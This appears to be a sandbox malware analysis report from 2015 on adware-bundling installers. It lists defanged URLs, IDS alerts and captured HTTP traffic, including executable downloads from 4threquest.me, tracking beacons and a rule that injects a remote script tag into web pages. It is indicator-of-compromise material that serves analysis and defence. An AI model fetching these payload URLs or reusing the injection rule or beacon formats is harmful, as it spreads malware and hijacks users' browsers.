hxxp://plainsavingscenter.com/if?alpha=VmkaOm5eUxUWBXAqNRBhVy1JN25WNRYSY3NRW24hCWxLOjpDVRcsXAVyWCxcWzlGMUUVCS1+eQgWH2t6Uz1jJBg8dVkgdgY2CT85LH81F2FVJHM4ZAMsThQsNkRPdXVYOjJfbAcXBz0CIF4bODl/eQIdYyUdaUwuTG0/FHFWTRM5aS4+CysLX2BQY0J0MCgvNUgpfyxrBD8XUDNmChxuNF06Ri1uHRUeUgFSNQc/Ogp9GXlGA0kGenNHNh4uOA9jJG8ObD4OVCpYUwE5JSp3bl1sFGsZbjNCehgTMVxYS3UXMy4Zby9KVU9BZw11UmN4SWMPbBBLTS18OhUsDTM6XkE/aVpnKAdwLBdSVWFvdS4vRAR0ZXwpbRY5DAU3f1lJJGIWbQRvMlxLCkYQUTUHIj0Mfx9/UQNdMmF/H38LNysILGwqGyZrTnkrW2RSaDZfNzsINVctDHNXHjULEzowZFwpNgV7Xzo1RRgeWl5Wawt1KVs5EmYSSh50OjoXPkZmeFk8FTAaMWFbUGJ0PAY8OzwpMwBhYiRAKGdWOBAbMC1zZhcMIS4SczZQGG4/bypaEGh7BxliKEMUSmRedQgrDjckQ0USTwhAOhpyeHN3VXlufnIFLnojEQ==
hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/index.php
hxxp://dyno3mlj15jgv.cloudfront.net/V19/amipb.js
hxxp://log.very911.com/install.gif?bundle=istartsurf&ptid=pcm&uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001
hxxp://xa.xingcloud.com/v4/sof-installer/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action=pcm.installer.istartsurf.regok
hxxp://xa.xingcloud.com/v4/sof-installer/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action=pcm.installer.istartsurf.hp
hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/finalize.php
hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/thankyou.php
hxxp://xa.xingcloud.com/v4/sof-installer/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action=pcm.installer.istartsurf.finish
hxxp://www.tjepgz.cc/3517/2
hxxp://www.tjepgz.cc/files/zip_r3/3517_89d09a830004d94b9f646d24de15e7f2/2.zip
hxxp://brsoftwarellc.com/services/rules.txt?dummy=504
hxxp://brsoftwarellc.com/services/update.php?v=1.0.0&key=ExkGaOfgf143vIy6PGcdsVIG3GG3xUSB&dummy=153
hxxp://www.gosaferllc.com/services/rules.txt?dummy=534
hxxp://www.gosaferllc.com/services/update.php?v=1.0.0&key=DjgSrxXMrVZd5ZDoXibWfcZQfB0nLdzw&dummy=112
hxxp://www.ninjasoftwarellc.com/services/rules.txt?dummy=243
hxxp://www.ninjasoftwarellc.com/services/update.php?v=1.2.0&key=FVz40gdklAiQUMMUD3ARa8NDKI9Pp0VX&dummy=708
hxxp://xa.xingcloud.com/v4/sof-installer/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action=pcm.installer.istartsurf.wpm
hxxp://xa.xingcloud.com/v4/sof-installer/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action=pcm.installer.istartsurf.ient
hxxp://xa.xingcloud.com/v4/sof-installer/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action=pcm.installer.istartsurf.RegWrite
hxxp://xa.xingcloud.com/v4/sof-ient/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action0=xa.geoip&action2=visit&update0=ref,pcm&update1=nation,us&update2=language,en&update3=version,2.8.8.2102&update4=chptid,pcm
hxxp://xa.xingcloud.com/v4/sof-ient/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action1=install.pcm
hxxp://xa.xingcloud.com/v4/searchprotect/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action0=xa.geoip&action1=visit&action2=install
hxxp://xa.xingcloud.com/v4/searchprotect/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action=visit.heartbeat.pcm&update0=ref,pcm&update1=nation,us&update2=language,en&update3=version,4.0.1.2105
hxxp://up.soft365.com/Fan/rebirth?uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001&ptid=pcm&ver=4.0.1.1716&dname=istartsurf
hxxp://cdn1.downloadcrest.com/V19/amipb.js
hxxp://www.related.deals/services/rules?dummy=212
hxxp://www.amoninst.com/index.php
hxxp://www.4threquest.me/310714d/310714_gs.exe?q2g54WndLShXYB3BIA5JVfobjOB2N=q2g54WndLShXYB3BIA5JVfobjOB2N
hxxp://www.4threquest.me/010914s/010914i.htm
hxxp://install.plainsavingscenter.com/ii?alpha=U2xSOyMpaRAdPUgWfREsUigBNiNTMF4TLnZUE29sDGkDO3dGUF8tEQB3EC0RXjwOMAgQDGV/NA0TV2o3VjgrJVU5cBEhOwMzQT50KXp9FixQITs5KQYpBhVhM0EHdDhdP3peIQISTzxPJVtTOXR6fEocLiAYIU1jSWh3FTxTSFs4JCszViohFHZJPHYuaTpVJQ9xUnR+RmwHRSUzVgUvTRdiA3RzTlAOEg8EOBpoJH04CAhSVQQ8J2NGagN5MFM4LC0CaDFseHYPVScoKWwobRV0HBcNNCsaLkRbMyYATStmEStRbmBTUl8wFAJsEX4tWT5HCQYNTmN+Il8CY3dVFGZ4bhZ+N095dF4gAms0bDV7CzEbYFF0fltrAUcjNUEFO3kMbls9ZldDCV1HQS1QPWRQOQs/AQQXSWc2EzNAPyVOXHBiEWg6AERhU3QRfW85MmJYJQcuVipyDH9WAS4sAkx4P1crU3wrBhBYTT5bLEc3cXlwJGdVUBoqeT4bZ3U2aRVsOG8KYDAdU1ttTjUoInAxd1hVYh8qG2kRLQohXmJTEiwvM2RMaWNXTEI0OSQ+NmwwW2ojLAYVTyp5OkJ8VjlmWzg4cVg8QyJiPCYQEA==
hxxp://www.amoninst.com/finalize.php
hxxp://www.amoninst.com/namen.php
hxxp://www.4threquest.me/registro/carregando.gif
hxxp://www.downloadcrest.com/tdownload.php
hxxp://www.related.deals/services/update/1.0.0/iCQPRHeOJjIUg2xbskzYtHYRcOspD6WL/120
hxxp://4threquest.me/310714d/310714_am2.exe?aleaTokenID=q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N
hxxp://4threquest.me/310714d/310714_a9.exe?aleaTokenID=q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N
hxxp://www.mobimidia.com/mobile/libacess_js.php?idm=R0JDNlBNS1RPRDo5MjMwMDA=
hxxp://4threquest.me/310714d/240714_ps.exe?aleaTokenID=q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N
hxxp://e0.extreme-dm.com/s9.g?login=pcofferp&jv=y&j=y&srw=1276&srb=32&l=http://www.4threquest.me/registro/310113f8.htm
hxxp://www.4threquest.me/registro/icone_cadeado.gif
hxxp://www.4threquest.me/010914s/verificar_ip.php
hxxp://www.mobimidia.com/mobile/MobiMidia_validation.js
hxxp://www.4threquest.me/310714d/310714_br.exe?q2g54WndLShXYB3BIA5JVfobjOB2N=q2g54WndLShXYB3BIA5JVfobjOB2N
hxxp://install.plainsavingscenter.com/mg?alpha=HyZPRnotGAhqT14bYGx1HmIcS3ofYE03fWFKOXdhHXUOIX0+L1I0EmhiTjJaMDJXZwQZUlU2MQZRaxkdDC51SwhncVMJcU8OQzZrVi9y
hxxp://www.brsoftwarellc.com/services/rules.txt?dummy=504
hxxp://www.mobimidia.com/mobile/mt-core.js
hxxp://install.plainsavingscenter.com/fp?alpha=UHAKO1kqRR0MZFxoJRFWUTRZNllQLBxKGHdxWy8GFiAEb0pGWwdKP1BGZToMDnt+bFElG2A/bkprKRY8VzgCOSk8BjouWnBZH08abykoWDgPbRFvGER0QkZRIhoKekJQIFMwXQwKCkk3WjsQPBUNbg9vI1cCYToaUXdbZ01DdzVlIlgPD3YdVDEZOBwoJGxSXQJuWXoCF2ULRklwHhhwQUtwUz1YVxwLRCdTOwZsDBxlWX52WRZnOQ0eK1YHFwpwKGJnLhYddAdfc0BhW3UlP0UndhgaOEcSeF1HWCceDnlHQHAVcVFrQBwIcgtmGz99C2ALGiBWGxA4HD1rUmM5VTgHPitMb0kuXghdGD16X3l/VWUORzlZXjw=
hxxp://www.brsoftwarellc.com/services/update.php?v=1.0.0&key=ExkGaOfgf143vIy6PGcdsVIG3GG3xUSB&dummy=153
hxxp://www.4threquest.me/310714d/291014_nj.exe?q2g54WndLShXYB3BIA5JVfobjOB2N=q2g54WndLShXYB3BIA5JVfobjOB2N
hxxp://install.plainsavingscenter.com/if?alpha=VmkaOm5eUxUWBXAqNRBhVy1JN25WNRYSY3NRW24hCWxLOjpDVRcsXAVyWCxcWzlGMUUVCS1+eQgWH2t6Uz1jJBg8dVkgdgY2CT85LH81F2FVJHM4ZAMsThQsNkRPdXVYOjJfbAcXBz0CIF4bODl/eQIdYyUdaUwuTG0/FHFWTRM5aS4+CysLX2BQY0J0MCgvNUgpfyxrBD8XUDNmChxuNF06Ri1uHRUeUgFSNQc/Ogp9GXlGA0kGenNHNh4uOA9jJG8ObD4OVCpYUwE5JSp3bl1sFGsZbjNCehgTMVxYS3UXMy4Zby9KVU9BZw11UmN4SWMPbBBLTS18OhUsDTM6XkE/aVpnKAdwLBdSVWFvdS4vRAR0ZXwpbRY5DAU3f1lJJGIWbQRvMlxLCkYQUTUHIj0Mfx9/UQNdMmF/H38LNysILGwqGyZrTnkrW2RSaDZfNzsINVctDHNXHjULEzowZFwpNgV7Xzo1RRgeWl5Wawt1KVs5EmYSSh50OjoXPkZmeFk8FTAaMWFbUGJ0PAY8OzwpMwBhYiRAKGdWOBAbMC1zZhcMIS4SczZQGG4/bypaEGh7BxliKEMUSmRedQgrDjckQ0USTwhAOhpyeHN3VXlufnIFLnojEQ==
hxxp://www.related.deals/services/stores?dummy=526
hxxp://www.amoninst.com/thankyou.php
hxxp://www.4threquest.me/registro/top-line.gif


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY User-Agent (NSIS_Inetc (Mozilla)) - Sometimes used by hostile installers
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
ET MALWARE SoundCloud Downloader Install Beacon

Traffic

GET /mobile/MobiMidia_validation.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.mobimidia.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Thu, 23 Apr 2015 07:23:56 GMT
Server: Apache
Last-Modified: Sun, 27 Oct 2013 16:29:25 GMT
ETag: "1b34285-23a2-4e9bb7c92e340"
Accept-Ranges: bytes
Content-Length: 9122
Connection: close
Content-Type: application/x-javascript
if (ID_MobiMidia_Serv != '') {.    .    ApiBlock = false;.    //docume
nt.write(unescape(""));.    .    .        .    docume
nt.write(unescape(""));.    function MobiMi
dia_addOption(selectId, txt, val, selected) {..var objOption = new Opt
ion(txt, val, selected);..self.document.getElementById(selectId).optio
ns.add(objOption);.    }.    function MobiMidia_keyNumber(e) {.       
 if (e.keyCode != 9 && e.keyCode != 13) {.            var keyChar = St
ring.fromCharCode(e.which ? e.which : e.keyCode);.            filtered
Values = "1234567890";.            if ((filteredValues.indexOf(keyChar
) == -1) && ((keyChar.charCodeAt(0) != 8)&&(keyChar.charCodeAt(0) != 4
6)&&(keyChar.charCodeAt(0) != 37)&&(keyChar.charCodeAt(0) != 38)&&(key
Char.charCodeAt(0) != 39)&&(keyChar.charCodeAt(0) != 40)) ) return fal
se;.        }.    }.    function MobiMidia_AtivaCel() {.        if (se
lf.document.getElementById('MobiMidia_DDD').value.length == 2) {.     
       self.document.getElementById('MobiMidia_Number').focus();.     
   }.    }.    .    function MobiMidia_NonoDigito() {.        if (self
.document.getElementById('MobiMidia_DDD').value < 30) {.       
<<< skipped >>>


GET /310714d/310714_br.exe?q2g54WndLShXYB3BIA5JVfobjOB2N=q2g54WndLShXYB3BIA5JVfobjOB2N HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.4threquest.me
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 23 Apr 2015 07:24:34 GMT
Content-Type: application/force-download
Connection: keep-alive
X-Powered-By: PHP/5.4.30
Content-Length: 1112281
Content-Description: File Transfer
Content-Disposition: attachment; filename="310714_br.exe"
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
X-Cache: BYPASS
CC: UA
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..i
u..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..................
......PE..L......K.................\..........<2.......p....@......
....................................................................s.
......................................................................
................p...............................text...ZZ.......\.....
............. ..`.rdata.......p.......`..............@[email protected]........
[email protected][email protected]
rc................v..............@..@.................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
.....>[email protected].>[email protected].
P.u...Pr@..}[email protected]... M.......M....3.....FQ.....N
U..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u
[email protected]}[email protected].}.j.W.E......E.......P
[email protected]@[email protected] [email protected]..
.\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i.....
.D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..
<<< skipped >>>

GET /310714d/291014_nj.exe?q2g54WndLShXYB3BIA5JVfobjOB2N=q2g54WndLShXYB3BIA5JVfobjOB2N HTTP/1.1


User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.4threquest.me
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 23 Apr 2015 07:24:38 GMT
Content-Type: application/force-download
Connection: keep-alive
X-Powered-By: PHP/5.4.30
Content-Length: 1849280
Content-Description: File Transfer
Content-Disposition: attachment; filename="291014_nj.exe"
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
X-Cache: BYPASS
CC: UA
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..i
u..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..................
......PE..L......K.................\..........<2.......p....@......
....................................................................s.
......................................................................
................p...............................text...ZZ.......\.....
............. ..`.rdata.......p.......`..............@[email protected]........
[email protected][email protected]
rc................v..............@..@.................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
.....>[email protected].>[email protected].
P.u...Pr@..}[email protected]... M.......M....3.....FQ.....N
U..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u
[email protected]}[email protected].}.j.W.E......E.......P
[email protected]@[email protected] [email protected]..
.\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i.....
.D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..
<<< skipped >>>

GET /310714d/310714_gs.exe?q2g54WndLShXYB3BIA5JVfobjOB2N=q2g54WndLShXYB3BIA5JVfobjOB2N HTTP/1.1


User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.4threquest.me
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 23 Apr 2015 07:24:46 GMT
Content-Type: application/octet-stream
Content-Length: 1112379
Last-Modified: Thu, 23 Apr 2015 07:24:03 GMT
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
CC: UA
Accept-Ranges: bytes
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..i
u..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..................
......PE..L......K.................\..........<2.......p....@......
....................................................................s.
......................................................................
................p...............................text...ZZ.......\.....
............. ..`.rdata.......p.......`..............@[email protected]........
[email protected][email protected]
rc................v..............@..@.................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
.....>[email protected].>[email protected].
P.u...Pr@..}[email protected]... M.......M....3.....FQ.....N
U..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u
[email protected]}[email protected].}.j.W.E......E.......P
[email protected]@[email protected] [email protected]..
.\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i.....
.D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..
<<< skipped >>>

GET /010914s/verificar_ip.php HTTP/1.1


Accept: */*
Referer: hXXp://VVV.4threquest.me/010914s/010914i.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.4threquest.me
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 23 Apr 2015 07:24:56 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.30
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
X-Cache: BYPASS
CC: UA
Content-Encoding: gzip
18............s.......X.......0..HTTP/1.1 200 OK..Server: nginx/1.0.15
..Date: Thu, 23 Apr 2015 07:24:56 GMT..Content-Type: text/html..Transf
er-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.4.30
..Access-Control-Allow-Origin: *..Access-Control-Allow-Headers: X-Requ
ested-With..X-Cache: BYPASS..CC: UA..Content-Encoding: gzip..18.......
.....s.......X.......0..



GET /services/rules.txt?dummy=504 HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.brsoftwarellc.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 23 Apr 2015 07:24:32 GMT
Content-Type: text/plain
Content-Length: 94
Connection: keep-alive
Last-Modified: Fri, 13 Feb 2015 14:24:53 GMT
ETag: "5ac277-5e-50ef8fffcf740"
Cache-Control: max-age=600
Expires: Thu, 23 Apr 2015 07:34:32 GMT
P3P: CP="Potato"
X-Cache: MISS
X-Server: Provided by Intermedia
X-Country: EU
Accept-Ranges: bytes
</body>|<script src="//queryjs.me/services/script.js" type="t
ext/javascript"></script></body>.HTTP/1.1 200 OK..Serve
r: nginx/1.6.2..Date: Thu, 23 Apr 2015 07:24:32 GMT..Content-Type: tex
t/plain..Content-Length: 94..Connection: keep-alive..Last-Modified: Fr
i, 13 Feb 2015 14:24:53 GMT..ETag: "5ac277-5e-50ef8fffcf740"..Cache-Co
ntrol: max-age=600..Expires: Thu, 23 Apr 2015 07:34:32 GMT..P3P: CP="P
otato"..X-Cache: MISS..X-Server: Provided by Intermedia..X-Country: EU
..Accept-Ranges: bytes..</body>|<script src="//queryjs.me/ser
vices/script.js" type="text/javascript"></script></body>
;.....


GET /services/update.php?v=1.0.0&key=ExkGaOfgf143vIy6PGcdsVIG3GG3xUSB&dummy=153 HTTP/1.0


Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.brsoftwarellc.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 23 Apr 2015 07:24:33 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
P3P: CP="Potato"
X-Cache: BYPASS
X-Server: Provided by Intermedia
X-Country: EU
HTTP/1.1 200 OK..Server: nginx/1.6.2..Date: Thu, 23 Apr 2015 07:24:33 
GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-aliv
e..P3P: CP="Potato"..X-Cache: BYPASS..X-Server: Provided by Intermedia
..X-Country: EU..



GET /registro/icone_cadeado.gif HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.4threquest.me
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 23 Apr 2015 07:24:25 GMT
Content-Type: image/gif
Content-Length: 2256
Last-Modified: Mon, 08 Dec 2014 13:27:40 GMT
Connection: keep-alive
Expires: Sat, 23 May 2015 07:24:25 GMT
Cache-Control: max-age=2592000
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
CC: UA
Accept-Ranges: bytes
GIF89a(.2....aH........z......i........r........X..7..................
.....8.. .....x..g.................?.....7..E.....n....f...^..$..H....
..........[........2...........:...........z.......m...W..l...........
......... ...................\........h..h4.p......*...........4......
........ ..............u.....3........K....{(.....(...........#.....i.
.J..b..........m........o.....................N.................l.....
#................c.................|..........I0............>....{.
........N.|=.m$..........w(..E.......L...[.s.%...a..g*..........v...3.
s........~..o .......................=..>....m...Z.....x...........
1........g........d......9*..............._....................z..t..}
........L..Y..B.....J..&.....0......................z>.. .q .......
....E.|.............!.......,....(.2........H..?;2n}.....|....H.....S.
..1..9),...F.-.(7&..b.K...u..1...vn.z)RF....5.!..B!...L...-.........d.
6.h.....2..h.&.?.1.&... .X1r..!D..da..t;0.7|s...*.lH.....U...........?
.......p....HK..r...jp...(e.........y.c.........mT.d$q.. (....G.d..P..
.S..)f..D........Td.;tw.`!...#..C a.....0..z....Z..r..V.0.1.x3.?....(.
6..l..C..y8"..N...=.L1B'....._....3|@.6#...8.(`......,.....;@QB#..BL..
$.d7.L0..A...:60..8.|@...l0........hA...<"..I......R..tt.O.'.aH..).
%[email protected].........(..3W....0xP.$".P.............X`*.......^.J....!. ..
......G..t..........j...<.."..A.......i.QJ.......jI\l.Zp....k......
....-.R....Yd.J.........n.?..H....D..DAo..jB_vJ.z.%................'lF
.......R...]d..".*;0"H.`....@r... .@[email protected].=k..@
<<< skipped >>>

GET /010914s/010914i.htm HTTP/1.1


Accept: */*
Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Connection: Keep-Alive
Host: VVV.4threquest.me


HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 23 Apr 2015 07:24:26 GMT
Content-Type: text/html
Last-Modified: Mon, 08 Dec 2014 13:27:43 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
CC: UA
Content-Encoding: gzip
2de.............Tmo.0..L~.wHlSI.....[...` (.|Bnri\.... ....N...D?4....
.s.99...\~y.`...i..(3.Th$.L...k...lj........~'.....h..B...P].........4
...(S..S....7.uE....A..}..P.!c.u@(..0..s.~>...0..*...Z Y..7v..N..Y{
C..).=a._._.....rq......M.'x.....u:...V.J.....-Z.&..md.z.2..Z~..HN.Hc.
.25....H.i.~S.&J..7-.....Z.i...) .Zm...Q3...aV..*.....-`...........0..
.......^....b.*`.$...--......tu.j...toe/..j../V.,.M.F....l.5..w..7...g
b..6........-V....y..s....x...^.w....#jj"...........m...k...4..d.^Q...
\..RI......v".ck.*..Zu..3QJ....8..hi\.r]bvr*..x.....r.EM..U&..Xh3...9%
.~..k..h.|...).v...v...vZ.<.. .9.#..]..!.x...a...D.A.......Y.......
.8g....v.P.c7.;M.i..w.$.:nO.....A..A..).>.G.x9Nog...:;:.. ...@ '{.\
o.U9..n.=Hj(...^...J8.;....g............`...G.....0..HTTP/1.1 200 OK..
Server: nginx/1.0.15..Date: Thu, 23 Apr 2015 07:24:26 GMT..Content-Typ
e: text/html..Last-Modified: Mon, 08 Dec 2014 13:27:43 GMT..Transfer-E
ncoding: chunked..Connection: keep-alive..Access-Control-Allow-Origin:
 *..Access-Control-Allow-Headers: X-Requested-With..CC: UA..Content-En
coding: gzip..2de.............Tmo.0..L~.wHlSI.....[...` (.|Bnri\.... .
...N...D?4.....s.99...\~y.`...i..(3.Th$.L...k...lj........~'.....h..B.
..P].........4...(S..S....7.uE....A..}..P.!c.u@(..0..s.~>...0..*...
Z Y..7v..N..Y{C..).=a._._.....rq......M.'x.....u:...V.J.....-Z.&..md.z
.2..Z~..HN.Hc..25....H.i.~S.&J..7-.....Z.i...) .Zm...Q3...aV..*.....-`
...........0.........^....b.*`.$...--......tu.j...toe/..j../V.,.M.F...
.l.5..w..7...gb..6........-V....y..s....x...^.w....#jj"...........
<<< skipped >>>


GET /i.gif HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/010914s/010914i.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: t1.extreme-dm.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.7.10
Date: Thu, 23 Apr 2015 07:23:55 GMT
Content-Type: image/gif
Content-Length: 1004
Last-Modified: Thu, 26 Feb 2004 13:56:07 GMT
Connection: close
ETag: "403dfaf7-3ec"
Expires: Fri, 24 Apr 2015 07:23:55 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes
GIF89a).&..>...............!..5&..*))%.9..J..N..k..n*(U)%p*.VQ%%X."
c&QPLLtttjhfaMf...$.....-&.9B.1B.S .ww.ii.RM.RM.po.dk.s...11.el.ZZ.c..
a..{..y...{.........................................................!.
....@.,....)[email protected],..H.o.l:..(S.KZ.G..............j.... pwX.....@.
....-...cuHwy`..~......~-...[El.}...........*~...E.E`./..... ......Y.C
........"."..10...% .B.Bz.-........."22442.1/'6L<%g....0.......B,.A
. .e7v.0...........C....e..P...9p..1........1 .>[email protected].. u.H.b../
[email protected].^.a.\. ..X...l.......7d.8...............hB..3G..Wc0Ci..=.C..<
;;....lsZ....2.7..y.g/F..2.e.1...;V<..".....gj..,d..).@.#...=^....B
 .zK...q-...q.......cD..r.b...2>...D...x.X&.F....c...,.Z..2..#.v..@
t.....`.Z,=.^2..>..Av8...$......@`B........G!...`..-..BD6.......g..
.<[email protected]........>...>......
..B...........G...h....yUJ`...5...W.....|..PE1.&./X`A... .E...Y.(...Q.
I0......ffAW....p......Q.\u..,[email protected]...
.`.......nDK...,..._d...xq.m........k...........n.A..;..



GET /Fan/rebirth?uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001&ptid=pcm&ver=4.0.1.1716&dname=istartsurf HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: up.soft365.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 23 Apr 2015 07:25:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14p1
Content-Encoding: gzip
14........................0..



GET /v4/searchprotect/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action0=xa.geoip&action1=visit&action2=install HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) in my heart of heart.
Host: xa.xingcloud.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 23 Apr 2015 07:25:01 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"0.93 ms","message":"store 4 action and 0 upd
ate "}..0..HTTP/1.1 200 OK..Server: nginx/1.6.2..Date: Thu, 23 Apr 201
5 07:25:01 GMT..Content-Type: text/html; charset=utf-8..Transfer-Encod
ing: chunked..Connection: keep-alive..X-Powered-By: PHP/5.3.3..xa-api-
version: v4..48..{"stats":"ok","time":"0.93 ms","message":"store 4 act
ion and 0 update "}..0..



GET /V19/amipb.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.amoninst.com/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn1.downloadcrest.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: application/x-javascript
Content-Length: 61399
Connection: keep-alive
Date: Thu, 19 Feb 2015 14:38:57 GMT
Last-Modified: Thu, 19 Feb 2015 14:37:18 GMT
ETag: "52bb6eb78bfd9436ad34be6fc97eae8c"
Accept-Ranges: bytes
Server: AmazonS3
Age: 59352
X-Cache: Hit from cloudfront
Via: 1.1 182f7fa5c3814caf19acb317d3eb85ad.cloudfront.net (CloudFront)
